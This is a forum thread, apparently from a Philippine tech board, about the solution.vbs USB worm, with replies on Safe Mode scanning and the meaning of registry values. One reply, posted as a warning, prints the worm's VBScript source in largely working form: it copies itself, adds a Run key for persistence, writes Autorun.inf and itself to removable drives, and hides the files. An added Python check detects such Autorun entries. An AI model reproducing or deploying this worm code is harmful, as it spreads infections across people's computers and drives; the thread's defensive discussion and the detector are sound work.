The Philippine Electronics and Technology Forum
February 09, 2012, 11:30:29 PM *
Author Topic: solution.VBS virus script  (Read 4054 times)
9 Volts
« Reply #20 on: April 11, 2010, 06:05:53 AM »

Try to scan in Safe Mode.

Why in safe mode? Is that any different from a normal scan?
Logged

If we hear, we forget; if we see, we remember; if we do, we understand. -- Proverb
theeye23
« Reply #21 on: April 11, 2010, 08:20:19 AM »

Yes, there is a difference. Most malware makes entries in the Windows startup, and the Windows startup functions only if Windows loads in normal mode. The other thing is that some malware uses hook functions only in normal mode. The exception is EXE infectors like SALITY, where the system is infected in both modes.

That's why you need to scan it in safe mode.
Logged

Beware of those with a crab mentality, they will pull you down!

They throw stones when you are laden... laden with fruit!
amadjo01
« Reply #22 on: July 27, 2010, 03:09:04 PM »

Do these keys need to be deleted?


      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"

What if the value of disable taskmanager = "1",
the value of regedit = "1",
the value of nofolderoptions = "1",
and on top of that disable gpedit = "1"?
What would happen?
Logged
amadjo01
« Reply #23 on: July 27, 2010, 03:11:10 PM »

Warning:
another virus I found, picked up from a USB flash drive.
I'm posting it here so that if you ever get infected by it, you'll know which registry entries the virus changes.
I deleted some of the code so it can't be used in case someone copies it.

On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax, pug, pou

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "solution.vbs" Then
   wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
   scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\solution.vbs")

Set myFile = fso.CreateTextFile(win & "\solution.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\solution.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""



While (true)

   Set myDrives = fso.Drives
   For Each myFlashDrive In myDrives

      If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

         If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
            fAttr.Attributes=32
            fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
         End If
     
         Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
         auFile.write "[autorun]" & vbCrLf & "open=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Command=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Default=1"
         auFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
         fAttr.Attributes=39

         Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\solution.vbs", true)
         myFile.write scrText
         myFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\solution.vbs")
         fAttr.Attributes=39

      End If

   Next

   With wscr
      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
   End With

pug = fso.Deletefile("C:\WINDOWS\auto.vbs")


 


Wend

The astig.vbs script looks something like this.

It also goes onto the flash drive so that it can spread.
Logged
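Added example, not part of the original thread or the poster's code: a small Python check that parses an Autorun.inf and flags launch entries that start Windows Script Host or a script file, which is the pattern the script in Reply #23 writes to each removable drive. The function names, the list of script hosts and extensions, and both sample files are assumptions constructed for this example.

```python
import re

# Script hosts and script extensions that a removable-media Autorun.inf
# has no good reason to launch (assumed list for this example).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "wscript", "cscript"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
# Keys that make Explorer run a command: open=, shellexecute=, shell\<verb>\command=
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def suspicious_entries(text):
    """List (key, value, reason) for commands that start a script host or script."""
    findings = []
    for key, value in parse_autorun(text).items():
        if not EXEC_KEY.match(key):
            continue
        tokens = [t.strip('"').lower() for t in value.split()]
        if tokens and tokens[0].rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            findings.append((key, value, "launches Windows Script Host"))
        elif any(t.endswith(SCRIPT_EXTS) for t in tokens):
            findings.append((key, value, "runs a script file"))
    return findings

# Constructed sample: the Autorun.inf content written by the posted script.
WORM_INF = ("[autorun]\r\nopen=wscript.exe solution.vbs\r\n"
            "shell\\Open\\Command=wscript.exe solution.vbs\r\nshell\\Open\\Default=1")
# Constructed benign sample for comparison.
BENIGN_INF = "[autorun]\nicon=setup.ico\nlabel=Backup\nopen=setup.exe\n"

if __name__ == "__main__":
    for name, inf in (("worm", WORM_INF), ("benign", BENIGN_INF)):
        print(name, suspicious_entries(inf))
```

The script sets attribute value 39 (read-only, hidden, system, archive) on the files it drops, so the Autorun.inf has to be read with hidden and system files shown before it can be passed to this check.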
jacks
« Reply #24 on: July 27, 2010, 03:43:02 PM »

What if the value of disable taskmanager = "1",
the value of regedit = "1",
the value of nofolderoptions = "1",
and on top of that disable gpedit = "1"?
What would happen?

1 means on, 0 means off.

So when nofolderoptions = 1, it means your Folder Options is hidden. Its link in Explorer and in Control Panel is hidden.

That's my understanding.

No folder options is on, so it is hidden.
Logged